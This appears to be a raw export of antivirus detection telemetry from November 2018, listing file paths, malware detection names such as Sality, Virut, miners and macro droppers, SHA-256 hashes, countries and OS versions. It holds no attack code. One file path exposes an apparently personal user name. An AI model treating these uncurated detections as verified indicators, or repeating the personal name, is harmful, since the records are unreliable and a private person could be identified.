  Row(detection=Row(filename='wmlaunch.exe', filepath='\\\\?\\C:\\Program Files\\Windows Media Player\\wmlaunch.exe', filesize=256000, name='W32/Virut.Gen.#M1.#R1'), hash='8fd2f1ff28358ee28f238498103b4b69a96127f8037a2cb0a18ccd0afa741d2f', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:16:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-03-17-10-39.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-26T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T00:40:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='0547b758.exe', filepath='A:\\maria\\Windows Executables\\0547B758.exe', filesize=1152000, name='TR/Patched.Ren.Gen2.#M300.#R101264'), hash='a08fbe0ac1609a45effb6e6c2806e4833eeed56b2797a24de85c91d1507647ef', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.356\\r.saver64.exe', parentsize=5847024, timestamp='2018-11-04T17:05:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-225720-debd49d2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-225720-DEBD49D2', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='398b9784731795a2a9159ae69dea840751d74fbe0f64b1e1929ea2fce6c6f138', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T21:57:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-154341-0db5abfe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77a591b5\\AVSCAN-20181104-154024-EED9F8A3\\AVSCAN-20181104-154341-0DB5ABFE', filesize=5632000, name='TR/Crypt.XPACK.Gen2.#M1.#R1'), hash='30832edce2c0babe49a581af32e7e4a87e257d22598bdcc3e501c0cecb1b33be', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:43:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-001245-6fa3a1f5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_56558570\\AVSCAN-20181105-000934-5B9BEDE8\\AVSCAN-20181105-001245-6FA3A1F5', filesize=256000, name='TR/Agent.9c4d03.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T20:42:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='unwise.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Native Instruments\\FM8\\UNWISE.EXE', filesize=320000, name='W32/Sality.AT.#M1.#R1'), hash='5076374018cd585f7ed34b3725c7d6d590fe67c2f86eb93b08fb221334900efa', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:23:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered fotec', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fotec', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a25a376c309db55fbf6556610e23f3b1b3692e233d3b7d2387b8f5e8366965dc', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:00:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='temp2.exe', filepath='\\\\?\\I:\\Ghost\\Fannan NewLook 6 Fin\\Software\\Fannan-Software\\Software\\docs\\Others\\Temp2.exe', filesize=192000, name='HEUR/APC.#M1.#R1'), hash='3b02d0406b4e487c443c350f760b4f677afc62b5259096ff323e1f01cadb79c7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:44:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-202227-b04c3646', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cbd99eb2\\AVSCAN-20181104-201154-631B45A0\\AVSCAN-20181104-202227-B04C3646', filesize=5260000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='631f664852d72a68a5192868894555b2d775c2886a2546411e331912b9bbc405', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T13:22:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\aswidsagent.exe', parentsize=6800144, timestamp='2018-11-04T15:19:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='diagnosticshub.standardcollector.service.exe', filepath='C:\\Windows\\System32\\DiagSvcs\\DiagnosticsHub.StandardCollector.Service.exe', filesize=64000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='a96290b02ca8f9ec46bf2021980c1cdb156290d0d603123a65cf58b56323af56', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T17:12:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-04T15:29:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00024185', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp00024185', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:45:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-03-17-10-39.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-26T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T04:10:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-222054-6141ea58', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6931b99d\\AVSCAN-20181104-221652-2BB38B21\\AVSCAN-20181104-222054-6141EA58', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:21:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-175724-9e654eb7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ec0ed311\\AVSCAN-20181104-175700-99CB43E7\\AVSCAN-20181104-175724-9E654EB7', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:57:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-194600-c3b8de96', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_eba24208\\AVSCAN-20181104-141832-F573C2FF\\AVSCAN-20181104-194600-C3B8DE96', filesize=556000, name='PUA/MPCCleaner.#M1.#R1'), hash='08cce85de6b7808af17666c9689a16e424590770839d9ee966d73b9580abc94f', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T16:44:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\\\\\/s \\\\\\"NIS\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Norton Internet Security\\\\\\\\Engine\\\\\\\\18.7.0.13\\\\\\\\diMaster.dll\\\\\\" \\\\\\/prefetch:1', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Norton Internet Security\\Engine\\18.7.0.13\\ccsvchst.exe', parentsize=130008, timestamp='2018-11-04T08:04:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='3ac565f9fff5cbf17585cb48094719ba0c8ac3b4', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\3ac565f9fff5cbf17585cb48094719ba0c8ac3b4', filesize=320000, name='Adware/DealPly.78d19b.#M1.#R1'), hash='78d19b6e70f6e792422d1e705b1cd8ee4688fa96c0bf62c9d28e2dd34ff667b4', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T18:56:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T07:01:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T16:10:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Desktop\\MSTAR\\ISP MSTART\\Setup (6)\\msimg32.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T22:50:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-184941-a969e745', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a5849ba8\\AVSCAN-20181104-172709-DA7A2B0A\\AVSCAN-20181104-184941-A969E745', filesize=256000, name='TR/Qadars.DV.#M1.#R1'), hash='bda35141854d6ab62fe8bac8c978b01b9249fc6486e7ce76a43363dee1a6d294', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:49:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T08:00:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-04T21:44:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T15:15:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='\\\\?\\C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='4d778157f4ff4a96304503cad4e99acb2836ca50b089c72d4b72aed38832779a', metadata=Row(cmdline=None, country='SD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:15:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T14:41:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\TEMP\\nsd2418.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Fotor3_3.4.1(163.15)_win32_x64_official.exe', parentsize=268416568, timestamp='2018-11-04T13:58:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered tisir', filepath='C:\\WINDOWS\\System32\\Tasks\\Yahoo! Powered tisir', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='8526df54488745e1e85c05d2a04cd546df21d06ba727eeae68b84f25a5b2cf6b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T23:00:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T04:11:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='coreldraw graphics suite x7 multilanguage.(incomplete).rar', filepath='\\\\?\\C:\\Users\\X\\Documents\\Usenet.nl\\Virus_X7 Graphics Suite Coreldraw Corel (2014) Build Corelcad - x86x64\\CorelDRAW Graphics Suite X7 Multilanguage.(incomplete).rar', filesize=30336000, name='TR/Dropper.MSIL.Gen4.#M300.#R301027'), hash='124d115f3cddbbd1b4b5b4ba4c0da662c9357deb55ed7fa78448f0f1b9b36654', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:19:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\heq3ecjuynz\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='\\\\\\/h \\\\\\/shared Global\\\\\\\\4e8bef7c48664b9d8e8b8e2e3f8ec8e1', country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\SysWOW64\\WerFault.exe', parentsize=360448, timestamp='2018-11-04T00:48:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T07:50:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-215646-bce4b3d9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-215646-BCE4B3D9', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:56:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-110417-7e9f6857', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c4dd6150\\AVSCAN-20181104-110004-6593C7B9\\AVSCAN-20181104-110417-7E9F6857', filesize=1600000, name='Adware/DealPly.bqeij.#M1.#R1'), hash='1623129501d3a77f371635e57f9f599b6a3d3d202427c7d5a95ca710d9f22f8b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:04:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-065751-c297ac04', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_99b6583d\\AVSCAN-20181105-063616-3B39D34A\\AVSCAN-20181105-065751-C297AC04', filesize=6200000, name='ADWARE/InstMonster.Gen7.#M1.#R1'), hash='40a2b8bcb78afb68c633b08ba494345f271f77e2173f8caf08d2c7fbe17c91ae', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T23:58:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T00:34:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='bleach_ cap 346-366.exe', filepath='F:\\Bleach_ Cap 346-366.exe', filesize=512000, name='TR/Dropper.Gen.#M300.#R241'), hash='a575da9d2ef9a3242803a58c22e090d66a06769f9853db5bd46eab5a6420c27f', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-04T15:21:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T08:07:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T14:35:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T22:47:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='C:\\Windows\\Temp\\nsg1871.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=18630056, timestamp='2018-11-02T10:17:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='eicfg_remover.exe', filepath='D:\\برامج\\WinSetupFromUSB-1-4\\files\\tools\\winisoutils\\eicfg_remover.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='9cba6504cd86e5e82780453c49cf9ceebd97f138ab5c45db00b05dd08a80ef74', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T11:17:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered fotec', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fotec', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a25a376c309db55fbf6556610e23f3b1b3692e233d3b7d2387b8f5e8366965dc', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:01:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='filezilla_3.29.0_win64-setup_bundled (2018_01_25 04_19_27 utc).exe', filepath='\\\\?\\D:\\FileHistory\\David\\ARITHMETIC\\Data\\C\\Users\\David\\Downloads\\FileZilla_3.29.0_win64-setup_bundled (2018_01_25 04_19_27 UTC).exe', filesize=8852000, name='PUA/FusionCore.P.#M1.#R1'), hash='d93fd89aa6de8363b364f522c38b171dc2a1d1525b7dd0d2c35fab0428c38255', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T21:11:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='b5422afccf7888847f524e47a100364bcbf3b3e6b020a2b12d2e69f1a0764067.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-19.available\\Avira\\B5422AFCCF7888847F524E47A100364BCBF3B3E6B020A2B12D2E69F1A0764067.VIR', filesize=448000, name='ADWARE/DealPly.Gen2.#M300.#R101520'), hash='b5422afccf7888847f524e47a100364bcbf3b3e6b020a2b12d2e69f1a0764067', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T05:50:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autokms.exe', filepath='C:\\Windows\\AutoKMS\\AutoKMS.exe', filesize=1856000, name='TR/Rogue.KDV.795271.1.#M1.#R1'), hash='ec418843efb4baeac8d80b9df6901e4860efda54941b64e346f97f9fde3a8994', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=103696, timestamp='2018-11-02T09:09:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-212628-07806a51', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3ea6883b\\AVSCAN-20181102-212603-0463A56C\\AVSCAN-20181102-212628-07806A51', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T20:26:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='updrgui.exe', filepath='C:\\PROGRAM FILES (X86)\\Avira\\ANTIVIR DESKTOP\\updrgui.exe', filesize=400000, name='W32/Sality.Patched.#M1.#R1'), hash='a439b92467f19dafed9fcf6b5490215b3bcd9d3c3d2b25bd9943b64311c56d64', metadata=Row(cmdline=None, country='LK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:25:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2345pinyinconfig.exe', filepath='\\\\?\\C:\\Program Files (x86)\\2345Soft\\2345Pinyin\\5.4.1.6820\\2345PinyinConfig.exe', filesize=5672000, name='W32/Sality.AT.#M1.#R1'), hash='d44100a6894846566eb08d0ba6581c40ae2fa5076edcdab567340c2564a0865d', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:50:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='TR/Miner.eevge.#M1.#R1'), hash='f6fbbd041481cca2e5e9fd947cd34e0dc066cb16a26cae3b37465c5a59d3403f', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:43:42Z'), dt=datetime.date(2018, 11, 2)),
